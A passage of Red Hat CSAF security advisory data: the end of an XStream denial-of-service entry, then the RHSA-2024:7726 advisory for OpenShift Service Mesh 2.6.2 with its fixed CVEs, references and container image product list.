"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-47072"
},
{
"category": "external",
"summary": "https://github.com/x-stream/xstream/commit/bb838ce2269cac47433e31c77b2b236466e9f266",
"url": "https://github.com/x-stream/xstream/commit/bb838ce2269cac47433e31c77b2b236466e9f266"
},
{
"category": "external",
"summary": "https://github.com/x-stream/xstream/security/advisories/GHSA-hfq9-hggm-c56q",
"url": "https://github.com/x-stream/xstream/security/advisories/GHSA-hfq9-hggm-c56q"
},
{
"category": "external",
"summary": "https://x-stream.github.io/CVE-2024-47072.html",
"url": "https://x-stream.github.io/CVE-2024-47072.html"
}
],
"release_date": "2024-11-07T23:38:52.978000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2024-11-25T16:56:04+00:00",
"details": "Before applying this update, make sure all previously released errata relevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"Red Hat Data Grid"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2024:10214"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"Red Hat Data Grid"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"Red Hat Data Grid"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "com.thoughtworks.xstream: XStream is vulnerable to a Denial of Service attack due to stack overflow from a manipulated binary input stream"
}
]
}
RHSA-2024_7726
Vulnerability from csaf_redhat - Published: 2024-10-07 09:24 - Updated: 2024-12-18 04:38Summary
Red Hat Security Advisory: Red Hat OpenShift Service Mesh Containers for 2.6.2
Notes
Topic
Red Hat OpenShift Service Mesh Containers for 2.6.2
This update has a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a
detailed severity rating, is available for each vulnerability from the CVE
link(s) in the References section.
Details
Red Hat OpenShift Service Mesh is Red Hat's distribution of the Istio service mesh project, tailored for installation into an OpenShift Container Platform installation.
Security Fix(es):
* send: Code Execution Vulnerability in Send Library (CVE-2024-43799)
* serve-static: Improper Sanitization in serve-static (CVE-2024-43800)
* express: Improper Input Handling in Express Redirects (CVE-2024-43796)
* path-to-regexp: Backtracking regular expressions cause ReDoS (CVE-2024-45296)
* webpack: DOM Clobbering vulnerability in AutoPublicPathRuntimeModule
(CVE-2024-43788)
* body-parser: Denial of Service Vulnerability in body-parser (CVE-2024-45590)
* envoy: Malicious log injection via access logs (CVE-2024-45808)
* envoy: Potential to manipulate `x-envoy` headers from external sources (CVE-2024-45806)
* envoy: Envoy crashes for `LocalReply` in HTTP async client (CVE-2024-45810)
* curl: libcurl: ASN.1 date parser overread (CVE-2024-7264)
* envoy: Potential to manipulate `x-envoy` headers from external sources (CVE-2024-45806)
For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.
Terms of Use
This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.
{
"document": {
"aggregate_severity": {
"namespace": "https://access.redhat.com/security/updates/classification/",
"text": "Important"
},
"category": "csaf_security_advisory",
"csaf_version": "2.0",
"distribution": {
"text": "Copyright \u00a9 Red Hat, Inc. All rights reserved.",
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "en",
"notes": [
{
"category": "summary",
"text": "Red Hat OpenShift Service Mesh Containers for 2.6.2\n\nThis update has a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a\ndetailed severity rating, is available for each vulnerability from the CVE\nlink(s) in the References section.",
"title": "Topic"
},
{
"category": "general",
"text": "Red Hat OpenShift Service Mesh is Red Hat\u0027s distribution of the Istio service mesh project, tailored for installation into an OpenShift Container Platform installation.\n\nSecurity Fix(es):\n* send: Code Execution Vulnerability in Send Library (CVE-2024-43799)\n* serve-static: Improper Sanitization in serve-static (CVE-2024-43800)\n* express: Improper Input Handling in Express Redirects (CVE-2024-43796)\n* path-to-regexp: Backtracking regular expressions cause ReDoS (CVE-2024-45296)\n* webpack: DOM Clobbering vulnerability in AutoPublicPathRuntimeModule\n(CVE-2024-43788)\n* body-parser: Denial of Service Vulnerability in body-parser (CVE-2024-45590)\n* envoy: Malicious log injection via access logs (CVE-2024-45808)\n* envoy: Potential to manipulate `x-envoy` headers from external sources (CVE-2024-45806)\n* envoy: Envoy crashes for `LocalReply` in HTTP async client (CVE-2024-45810)\n* curl: libcurl: ASN.1 date parser overread (CVE-2024-7264)\n* envoy: Potential to manipulate `x-envoy` headers from external sources (CVE-2024-45806)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.",
"title": "Details"
},
{
"category": "legal_disclaimer",
"text": "This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.",
"title": "Terms of Use"
}
],
"publisher": {
"category": "vendor",
"contact_details": "https://access.redhat.com/security/team/contact/",
"issuing_authority": "Red Hat Product Security is responsible for vulnerability handling across all Red Hat products and services.",
"name": "Red Hat Product Security",
"namespace": "https://www.redhat.com"
},
"references": [
{
"category": "self",
"summary": "https://access.redhat.com/errata/RHSA-2024:7726",
"url": "https://access.redhat.com/errata/RHSA-2024:7726"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/updates/classification/#important",
"url": "https://access.redhat.com/security/updates/classification/#important"
},
{
"category": "external",
"summary": "2301888",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2301888"
},
{
"category": "external",
"summary": "2308193",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2308193"
},
{
"category": "external",
"summary": "2310908",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2310908"
},
{
"category": "external",
"summary": "2311152",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2311152"
},
{
"category": "external",
"summary": "2311153",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2311153"
},
{
"category": "external",
"summary": "2311154",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2311154"
},
{
"category": "external",
"summary": "2311171",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2311171"
},
{
"category": "external",
"summary": "2313683",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2313683"
},
{
"category": "external",
"summary": "2313685",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2313685"
},
{
"category": "external",
"summary": "2313687",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2313687"
},
{
"category": "external",
"summary": "OSSM-3337",
"url": "https://issues.redhat.com/browse/OSSM-3337"
},
{
"category": "external",
"summary": "OSSM-8001",
"url": "https://issues.redhat.com/browse/OSSM-8001"
},
{
"category": "external",
"summary": "OSSM-8099",
"url": "https://issues.redhat.com/browse/OSSM-8099"
},
{
"category": "self",
"summary": "Canonical URL",
"url": "https://security.access.redhat.com/data/csaf/v2/advisories/2024/rhsa-2024_7726.json"
}
],
"title": "Red Hat Security Advisory: Red Hat OpenShift Service Mesh Containers for 2.6.2",
"tracking": {
"current_release_date": "2024-12-18T04:38:31+00:00",
"generator": {
"date": "2024-12-18T04:38:31+00:00",
"engine": {
"name": "Red Hat SDEngine",
"version": "4.2.3"
}
},
"id": "RHSA-2024:7726",
"initial_release_date": "2024-10-07T09:24:48+00:00",
"revision_history": [
{
"date": "2024-10-07T09:24:48+00:00",
"number": "1",
"summary": "Initial version"
},
{
"date": "2024-10-07T09:24:48+00:00",
"number": "2",
"summary": "Last updated version"
},
{
"date": "2024-12-18T04:38:31+00:00",
"number": "3",
"summary": "Last generated version"
}
],
"status": "final",
"version": "3"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_name",
"name": "RHOSSM 2.6 for RHEL 8",
"product": {
"name": "RHOSSM 2.6 for RHEL 8",
"product_id": "8Base-RHOSSM-2.6",
"product_identification_helper": {
"cpe": "cpe:/a:redhat:service_mesh:2.6::el8"
}
}
},
{
"category": "product_name",
"name": "RHOSSM 2.6 for RHEL 9",
"product": {
"name": "RHOSSM 2.6 for RHEL 9",
"product_id": "9Base-RHOSSM-2.6",
"product_identification_helper": {
"cpe": "cpe:/a:redhat:service_mesh:2.6::el9"
}
}
}
],
"category": "product_family",
"name": "Red Hat OpenShift Service Mesh"
},
{
"branches": [
{
"category": "product_version",
"name": "openshift-service-mesh/kiali-ossmc-rhel8@sha256:29cf0230854ac71bb01095db0b07783bac74d12b4164d263bd66f1d225fb48bd_ppc64le",
"product": {
"name": "openshift-service-mesh/kiali-ossmc-rhel8@sha256:29cf0230854ac71bb01095db0b07783bac74d12b4164d263bd66f1d225fb48bd_ppc64le",
"product_id": "openshift-service-mesh/kiali-ossmc-rhel8@sha256:29cf0230854ac71bb01095db0b07783bac74d12b4164d263bd66f1d225fb48bd_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/kiali-ossmc-rhel8@sha256:29cf0230854ac71bb01095db0b07783bac74d12b4164d263bd66f1d225fb48bd?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift-service-mesh/kiali-ossmc-rhel8\u0026tag=1.89.2-3"
}
}
},
{
"category": "product_version",
"name": "openshift-service-mesh/istio-cni-rhel8@sha256:b72249b5326e4606f53a0130f099ccb636241de275891f98e0a622c8db1a4c9c_ppc64le",
"product": {
"name": "openshift-service-mesh/istio-cni-rhel8@sha256:b72249b5326e4606f53a0130f099ccb636241de275891f98e0a622c8db1a4c9c_ppc64le",
"product_id": "openshift-service-mesh/istio-cni-rhel8@sha256:b72249b5326e4606f53a0130f099ccb636241de275891f98e0a622c8db1a4c9c_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/istio-cni-rhel8@sha256:b72249b5326e4606f53a0130f099ccb636241de275891f98e0a622c8db1a4c9c?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift-service-mesh/istio-cni-rhel8\u0026tag=2.6.2-5"
}
}
},
{
"category": "product_version",
"name": "openshift-service-mesh/grafana-rhel8@sha256:58760b14fd38690a490f7a5ea01e44c5ceee193324488ed4016203c042f88e7b_ppc64le",
"product": {
"name": "openshift-service-mesh/grafana-rhel8@sha256:58760b14fd38690a490f7a5ea01e44c5ceee193324488ed4016203c042f88e7b_ppc64le",
"product_id": "openshift-service-mesh/grafana-rhel8@sha256:58760b14fd38690a490f7a5ea01e44c5ceee193324488ed4016203c042f88e7b_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/grafana-rhel8@sha256:58760b14fd38690a490f7a5ea01e44c5ceee193324488ed4016203c042f88e7b?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift-service-mesh/grafana-rhel8\u0026tag=2.6.2-3"
}
}
},
{
"category": "product_version",
"name": "openshift-service-mesh/kiali-rhel8@sha256:ce49c56b67a541d00a985c7e7da4a8d36d968f93bafd5d037586476c3583f9d8_ppc64le",
"product": {
"name": "openshift-service-mesh/kiali-rhel8@sha256:ce49c56b67a541d00a985c7e7da4a8d36d968f93bafd5d037586476c3583f9d8_ppc64le",
"product_id": "openshift-service-mesh/kiali-rhel8@sha256:ce49c56b67a541d00a985c7e7da4a8d36d968f93bafd5d037586476c3583f9d8_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/kiali-rhel8@sha256:ce49c56b67a541d00a985c7e7da4a8d36d968f93bafd5d037586476c3583f9d8?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift-service-mesh/kiali-rhel8\u0026tag=1.89.4-3"
}
}
},
{
"category": "product_version",
"name": "openshift-service-mesh/kiali-rhel8-operator@sha256:7a35294bd4d2a4f9d2fbc3ac1f24e8aef5aa0a84c2780c275348c77df68f5a32_ppc64le",
"product": {
"name": "openshift-service-mesh/kiali-rhel8-operator@sha256:7a35294bd4d2a4f9d2fbc3ac1f24e8aef5aa0a84c2780c275348c77df68f5a32_ppc64le",
"product_id": "openshift-service-mesh/kiali-rhel8-operator@sha256:7a35294bd4d2a4f9d2fbc3ac1f24e8aef5aa0a84c2780c275348c77df68f5a32_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/kiali-rhel8-operator@sha256:7a35294bd4d2a4f9d2fbc3ac1f24e8aef5aa0a84c2780c275348c77df68f5a32?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift-service-mesh/kiali-rhel8-operator\u0026tag=1.89.6-1"
}
}
},
{
"category": "product_version",
"name": "openshift-service-mesh/istio-must-gather-rhel8@sha256:32d02294f6c3ed5ee704852afb31a98777eeae19fa48f2cfbfa0aa17701eb025_ppc64le",
"product": {
"name": "openshift-service-mesh/istio-must-gather-rhel8@sha256:32d02294f6c3ed5ee704852afb31a98777eeae19fa48f2cfbfa0aa17701eb025_ppc64le",
"product_id": "openshift-service-mesh/istio-must-gather-rhel8@sha256:32d02294f6c3ed5ee704852afb31a98777eeae19fa48f2cfbfa0aa17701eb025_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/istio-must-gather-rhel8@sha256:32d02294f6c3ed5ee704852afb31a98777eeae19fa48f2cfbfa0aa17701eb025?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift-service-mesh/istio-must-gather-rhel8\u0026tag=2.6.2-4"
}
}
},
{
"category": "product_version",
"name": "openshift-service-mesh/istio-rhel8-operator@sha256:231e044e7f872d658114881aab776604e583d2b8da0448a2272ffd15c711db3d_ppc64le",
"product": {
"name": "openshift-service-mesh/istio-rhel8-operator@sha256:231e044e7f872d658114881aab776604e583d2b8da0448a2272ffd15c711db3d_ppc64le",
"product_id": "openshift-service-mesh/istio-rhel8-operator@sha256:231e044e7f872d658114881aab776604e583d2b8da0448a2272ffd15c711db3d_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/istio-rhel8-operator@sha256:231e044e7f872d658114881aab776604e583d2b8da0448a2272ffd15c711db3d?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift-service-mesh/istio-rhel8-operator\u0026tag=2.6.2-5"
}
}
},
{
"category": "product_version",
"name": "openshift-service-mesh/pilot-rhel8@sha256:03e25e6be5dd9909f4917494c282eaa888bcb3e2a1b6fdb6e819be8bfcde3578_ppc64le",
"product": {
"name": "openshift-service-mesh/pilot-rhel8@sha256:03e25e6be5dd9909f4917494c282eaa888bcb3e2a1b6fdb6e819be8bfcde3578_ppc64le",
"product_id": "openshift-service-mesh/pilot-rhel8@sha256:03e25e6be5dd9909f4917494c282eaa888bcb3e2a1b6fdb6e819be8bfcde3578_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/pilot-rhel8@sha256:03e25e6be5dd9909f4917494c282eaa888bcb3e2a1b6fdb6e819be8bfcde3578?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift-service-mesh/pilot-rhel8\u0026tag=2.6.2-5"
}
}
},
{
"category": "product_version",
"name": "openshift-service-mesh/proxyv2-rhel9@sha256:11e2e2f3a3b26a9d79573277c6f38d06f6906bdda547556fe92eee57a89fe86e_ppc64le",
"product": {
"name": "openshift-service-mesh/proxyv2-rhel9@sha256:11e2e2f3a3b26a9d79573277c6f38d06f6906bdda547556fe92eee57a89fe86e_ppc64le",
"product_id": "openshift-service-mesh/proxyv2-rhel9@sha256:11e2e2f3a3b26a9d79573277c6f38d06f6906bdda547556fe92eee57a89fe86e_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/proxyv2-rhel9@sha256:11e2e2f3a3b26a9d79573277c6f38d06f6906bdda547556fe92eee57a89fe86e?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift-service-mesh/proxyv2-rhel9\u0026tag=2.6.2-7"
}
}
},
{
"category": "product_version",
"name": "openshift-service-mesh/ratelimit-rhel8@sha256:8e103924f51e6697e0a6890e9aaafd9b48e1fef7a8300badcac6bb0220807794_ppc64le",
"product": {
"name": "openshift-service-mesh/ratelimit-rhel8@sha256:8e103924f51e6697e0a6890e9aaafd9b48e1fef7a8300badcac6bb0220807794_ppc64le",
"product_id": "openshift-service-mesh/ratelimit-rhel8@sha256:8e103924f51e6697e0a6890e9aaafd9b48e1fef7a8300badcac6bb0220807794_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/ratelimit-rhel8@sha256:8e103924f51e6697e0a6890e9aaafd9b48e1fef7a8300badcac6bb0220807794?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift-service-mesh/ratelimit-rhel8\u0026tag=2.6.2-3"
}
}
}
],
"category": "architecture",
"name": "ppc64le"
},
{
"branches": [
{
"category": "product_version",
"name": "openshift-service-mesh/kiali-ossmc-rhel8@sha256:d6ae2eb93558b129b0051980ff73e0e09d41763eb29c2564a28a60281d9f59c7_arm64",
"product": {
"name": "openshift-service-mesh/kiali-ossmc-rhel8@sha256:d6ae2eb93558b129b0051980ff73e0e09d41763eb29c2564a28a60281d9f59c7_arm64",
"product_id": "openshift-service-mesh/kiali-ossmc-rhel8@sha256:d6ae2eb93558b129b0051980ff73e0e09d41763eb29c2564a28a60281d9f59c7_arm64",
"product_identification_helper": {
"purl": "pkg:oci/kiali-ossmc-rhel8@sha256:d6ae2eb93558b129b0051980ff73e0e09d41763eb29c2564a28a60281d9f59c7?arch=arm64\u0026repository_url=registry.redhat.io/openshift-service-mesh/kiali-ossmc-rhel8\u0026tag=1.89.2-3"
}
}
},
{
"category": "product_version",
"name": "openshift-service-mesh/istio-cni-rhel8@sha256:c5562019a94ccaa070d4c2107b992847ecfdee49c1f4dd3043e3c20307b74112_arm64",
"product": {
"name": "openshift-service-mesh/istio-cni-rhel8@sha256:c5562019a94ccaa070d4c2107b992847ecfdee49c1f4dd3043e3c20307b74112_arm64",
"product_id": "openshift-service-mesh/istio-cni-rhel8@sha256:c5562019a94ccaa070d4c2107b992847ecfdee49c1f4dd3043e3c20307b74112_arm64",
"product_identification_helper": {
"purl": "pkg:oci/istio-cni-rhel8@sha256:c5562019a94ccaa070d4c2107b992847ecfdee49c1f4dd3043e3c20307b74112?arch=arm64\u0026repository_url=registry.redhat.io/openshift-service-mesh/istio-cni-rhel8\u0026tag=2.6.2-5"
}
}
},
{
"category": "product_version",
"name": "openshift-service-mesh/grafana-rhel8@sha256:26d5dec1bf366dac99df61dd31cf8a6a6937b4e81d1d61a3b3b57e7bf8ee3375_arm64",
"product": {
"name": "openshift-service-mesh/grafana-rhel8@sha256:26d5dec1bf366dac99df61dd31cf8a6a6937b4e81d1d61a3b3b57e7bf8ee3375_arm64",
"product_id": "openshift-service-mesh/grafana-rhel8@sha256:26d5dec1bf366dac99df61dd31cf8a6a6937b4e81d1d61a3b3b57e7bf8ee3375_arm64",
"product_identification_helper": {
"purl": "pkg:oci/grafana-rhel8@sha256:26d5dec1bf366dac99df61dd31cf8a6a6937b4e81d1d61a3b3b57e7bf8ee3375?arch=arm64\u0026repository_url=registry.redhat.io/openshift-service-mesh/grafana-rhel8\u0026tag=2.6.2-3"
}
}
},
{
"category": "product_version",
"name": "openshift-service-mesh/kiali-rhel8@sha256:4223dcfd7630709f2841b220281120cc6010548d8e59e27cebdf304f16fcf3ac_arm64",
"product": {
"name": "openshift-service-mesh/kiali-rhel8@sha256:4223dcfd7630709f2841b220281120cc6010548d8e59e27cebdf304f16fcf3ac_arm64",
"product_id": "openshift-service-mesh/kiali-rhel8@sha256:4223dcfd7630709f2841b220281120cc6010548d8e59e27cebdf304f16fcf3ac_arm64",
"product_identification_helper": {
"purl": "pkg:oci/kiali-rhel8@sha256:4223dcfd7630709f2841b220281120cc6010548d8e59e27cebdf304f16fcf3ac?arch=arm64\u0026repository_url=registry.redhat.io/openshift-service-mesh/kiali-rhel8\u0026tag=1.89.4-3"
}
}
},
{
"category": "product_version",
"name": "openshift-service-mesh/kiali-rhel8-operator@sha256:80ad09921b68b246a30bcfebef670cac228e5b8e0a7db63c0462e09a518d68ec_arm64",
"product": {
"name": "openshift-service-mesh/kiali-rhel8-operator@sha256:80ad09921b68b246a30bcfebef670cac228e5b8e0a7db63c0462e09a518d68ec_arm64",
"product_id": "openshift-service-mesh/kiali-rhel8-operator@sha256:80ad09921b68b246a30bcfebef670cac228e5b8e0a7db63c0462e09a518d68ec_arm64",
"product_identification_helper": {
"purl": "pkg:oci/kiali-rhel8-operator@sha256:80ad09921b68b246a30bcfebef670cac228e5b8e0a7db63c0462e09a518d68ec?arch=arm64\u0026repository_url=registry.redhat.io/openshift-service-mesh/kiali-rhel8-operator\u0026tag=1.89.6-1"
}
}
},
{
"category": "product_version",
"name": "openshift-service-mesh/istio-must-gather-rhel8@sha256:7a69b6ecf90b9be263edfca0ffa4f40cb8c076f7472559efb09a83a48da92de5_arm64",
"product": {
"name": "openshift-service-mesh/istio-must-gather-rhel8@sha256:7a69b6ecf90b9be263edfca0ffa4f40cb8c076f7472559efb09a83a48da92de5_arm64",
"product_id": "openshift-service-mesh/istio-must-gather-rhel8@sha256:7a69b6ecf90b9be263edfca0ffa4f40cb8c076f7472559efb09a83a48da92de5_arm64",
"product_identification_helper": {
"purl": "pkg:oci/istio-must-gather-rhel8@sha256:7a69b6ecf90b9be263edfca0ffa4f40cb8c076f7472559efb09a83a48da92de5?arch=arm64\u0026repository_url=registry.redhat.io/openshift-service-mesh/istio-must-gather-rhel8\u0026tag=2.6.2-4"
}
}
},
{
"category": "product_version",
"name": "openshift-service-mesh/istio-rhel8-operator@sha256:cf746daf197865ecb846af2475fcea56c0555c8bdafb7864d4718f1da3d872dc_arm64",
"product": {
"name": "openshift-service-mesh/istio-rhel8-operator@sha256:cf746daf197865ecb846af2475fcea56c0555c8bdafb7864d4718f1da3d872dc_arm64",
"product_id": "openshift-service-mesh/istio-rhel8-operator@sha256:cf746daf197865ecb846af2475fcea56c0555c8bdafb7864d4718f1da3d872dc_arm64",
"product_identification_helper": {
"purl": "pkg:oci/istio-rhel8-operator@sha256:cf746daf197865ecb846af2475fcea56c0555c8bdafb7864d4718f1da3d872dc?arch=arm64\u0026repository_url=registry.redhat.io/openshift-service-mesh/istio-rhel8-operator\u0026tag=2.6.2-5"
}
}
},
{
"category": "product_version",
"name": "openshift-service-mesh/pilot-rhel8@sha256:a99e9d30ac8b5767b7eb95c3183f8dde99130ce5441928da1082a4e48108715b_arm64",
"product": {
"name": "openshift-service-mesh/pilot-rhel8@sha256:a99e9d30ac8b5767b7eb95c3183f8dde99130ce5441928da1082a4e48108715b_arm64",
"product_id": "openshift-service-mesh/pilot-rhel8@sha256:a99e9d30ac8b5767b7eb95c3183f8dde99130ce5441928da1082a4e48108715b_arm64",
"product_identification_helper": {
"purl": "pkg:oci/pilot-rhel8@sha256:a99e9d30ac8b5767b7eb95c3183f8dde99130ce5441928da1082a4e48108715b?arch=arm64\u0026repository_url=registry.redhat.io/openshift-service-mesh/pilot-rhel8\u0026tag=2.6.2-5"
}
}
},
{
"category": "product_version",
"name": "openshift-service-mesh/proxyv2-rhel9@sha256:cdfee2e141fa6559a6c64373177a4a666e39052add4498b880c08c496e25109e_arm64",
"product": {
"name": "openshift-service-mesh/proxyv2-rhel9@sha256:cdfee2e141fa6559a6c64373177a4a666e39052add4498b880c08c496e25109e_arm64",
"product_id": "openshift-service-mesh/proxyv2-rhel9@sha256:cdfee2e141fa6559a6c64373177a4a666e39052add4498b880c08c496e25109e_arm64",
"product_identification_helper": {
"purl": "pkg:oci/proxyv2-rhel9@sha256:cdfee2e141fa6559a6c64373177a4a666e39052add4498b880c08c496e25109e?arch=arm64\u0026repository_url=registry.redhat.io/openshift-service-mesh/proxyv2-rhel9\u0026tag=2.6.2-7"
}
}
},
{
"category": "product_version",
"name": "openshift-service-mesh/ratelimit-rhel8@sha256:40e075e75225da1082774c0ec33b314b9659d27e36fb698726d466a7be0e63f3_arm64",
"product": {
"name": "openshift-service-mesh/ratelimit-rhel8@sha256:40e075e75225da1082774c0ec33b314b9659d27e36fb698726d466a7be0e63f3_arm64",
"product_id": "openshift-service-mesh/ratelimit-rhel8@sha256:40e075e75225da1082774c0ec33b314b9659d27e36fb698726d466a7be0e63f3_arm64",
"product_identification_helper": {
"purl": "pkg:oci/ratelimit-rhel8@sha256:40e075e75225da1082774c0ec33b314b9659d27e36fb698726d466a7be0e63f3?arch=arm64\u0026repository_url=registry.redhat.io/openshift-service-mesh/ratelimit-rhel8\u0026tag=2.6.2-3"
}
}
}
],
"category": "architecture",
"name": "arm64"
},
{
"branches": [
{
"category": "product_version",
"name": "openshift-service-mesh/kiali-ossmc-rhel8@sha256:2050b64b6d66ba3c4a068311ab1737219c318ec4f9e4b07cc33fecf47c3b6795_amd64",
"product": {
"name": "openshift-service-mesh/kiali-ossmc-rhel8@sha256:2050b64b6d66ba3c4a068311ab1737219c318ec4f9e4b07cc33fecf47c3b6795_amd64",
"product_id": "openshift-service-mesh/kiali-ossmc-rhel8@sha256:2050b64b6d66ba3c4a068311ab1737219c318ec4f9e4b07cc33fecf47c3b6795_amd64",
"product_identification_helper": {
"purl": "pkg:oci/kiali-ossmc-rhel8@sha256:2050b64b6d66ba3c4a068311ab1737219c318ec4f9e4b07cc33fecf47c3b6795?arch=amd64\u0026repository_url=registry.redhat.io/openshift-service-mesh/kiali-ossmc-rhel8\u0026tag=1.89.2-3"
}
}
},
{
"category": "product_version",
"name": "openshift-service-mesh/istio-cni-rhel8@sha256:3c5142ebe3cb9c77b67c29fd7a6fb6b5176ace9833f69aaebec658b4ca8232ad_amd64",
"product": {
"name": "openshift-service-mesh/istio-cni-rhel8@sha256:3c5142ebe3cb9c77b67c29fd7a6fb6b5176ace9833f69aaebec658b4ca8232ad_amd64",
"product_id": "openshift-service-mesh/istio-cni-rhel8@sha256:3c5142ebe3cb9c77b67c29fd7a6fb6b5176ace9833f69aaebec658b4ca8232ad_amd64",
"product_identification_helper": {
"purl": "pkg:oci/istio-cni-rhel8@sha256:3c5142ebe3cb9c77b67c29fd7a6fb6b5176ace9833f69aaebec658b4ca8232ad?arch=amd64\u0026repository_url=registry.redhat.io/openshift-service-mesh/istio-cni-rhel8\u0026tag=2.6.2-5"
}
}
},
{
"category": "product_version",
"name": "openshift-service-mesh/grafana-rhel8@sha256:a50a14787a8765c1c9da772d58d08138cacb29ba41e32bc3f5c0ff9b8452d40b_amd64",
"product": {
"name": "openshift-service-mesh/grafana-rhel8@sha256:a50a14787a8765c1c9da772d58d08138cacb29ba41e32bc3f5c0ff9b8452d40b_amd64",
"product_id": "openshift-service-mesh/grafana-rhel8@sha256:a50a14787a8765c1c9da772d58d08138cacb29ba41e32bc3f5c0ff9b8452d40b_amd64",
"product_identification_helper": {
"purl": "pkg:oci/grafana-rhel8@sha256:a50a14787a8765c1c9da772d58d08138cacb29ba41e32bc3f5c0ff9b8452d40b?arch=amd64\u0026repository_url=registry.redhat.io/openshift-service-mesh/grafana-rhel8\u0026tag=2.6.2-3"
}
}
},
{
"category": "product_version",
"name": "openshift-service-mesh/kiali-rhel8@sha256:37bb32758dbda228f036d2b0cb3cf7010926334f9ebc82bebf0cac5c397c9bd3_amd64",
"product": {
"name": "openshift-service-mesh/kiali-rhel8@sha256:37bb32758dbda228f036d2b0cb3cf7010926334f9ebc82bebf0cac5c397c9bd3_amd64",
"product_id": "openshift-service-mesh/kiali-rhel8@sha256:37bb32758dbda228f036d2b0cb3cf7010926334f9ebc82bebf0cac5c397c9bd3_amd64",
"product_identification_helper": {
"purl": "pkg:oci/kiali-rhel8@sha256:37bb32758dbda228f036d2b0cb3cf7010926334f9ebc82bebf0cac5c397c9bd3?arch=amd64\u0026repository_url=registry.redhat.io/openshift-service-mesh/kiali-rhel8\u0026tag=1.89.4-3"
}
}
},
{
"category": "product_version",
"name": "openshift-service-mesh/kiali-rhel8-operator@sha256:b28f8f238dfa4dc4590fe326ef1c0db17238dda3640a0e9fdf8fb93a69b4e0c3_amd64",
"product": {
"name": "openshift-service-mesh/kiali-rhel8-operator@sha256:b28f8f238dfa4dc4590fe326ef1c0db17238dda3640a0e9fdf8fb93a69b4e0c3_amd64",
"product_id": "openshift-service-mesh/kiali-rhel8-operator@sha256:b28f8f238dfa4dc4590fe326ef1c0db17238dda3640a0e9fdf8fb93a69b4e0c3_amd64",
"product_identification_helper": {
"purl": "pkg:oci/kiali-rhel8-operator@sha256:b28f8f238dfa4dc4590fe326ef1c0db17238dda3640a0e9fdf8fb93a69b4e0c3?arch=amd64\u0026repository_url=registry.redhat.io/openshift-service-mesh/kiali-rhel8-operator\u0026tag=1.89.6-1"
}
}
},
{
"category": "product_version",
"name": "openshift-service-mesh/istio-must-gather-rhel8@sha256:c00a763b4b037c92378363a29e55c057fd1ae5e7efaded6ca6e53c4be1c13404_amd64",
"product": {
"name": "openshift-service-mesh/istio-must-gather-rhel8@sha256:c00a763b4b037c92378363a29e55c057fd1ae5e7efaded6ca6e53c4be1c13404_amd64",
"product_id": "openshift-service-mesh/istio-must-gather-rhel8@sha256:c00a763b4b037c92378363a29e55c057fd1ae5e7efaded6ca6e53c4be1c13404_amd64",
"product_identification_helper": {
"purl": "pkg:oci/istio-must-gather-rhel8@sha256:c00a763b4b037c92378363a29e55c057fd1ae5e7efaded6ca6e53c4be1c13404?arch=amd64\u0026repository_url=registry.redhat.io/openshift-service-mesh/istio-must-gather-rhel8\u0026tag=2.6.2-4"
}
}
},
{
"category": "product_version",
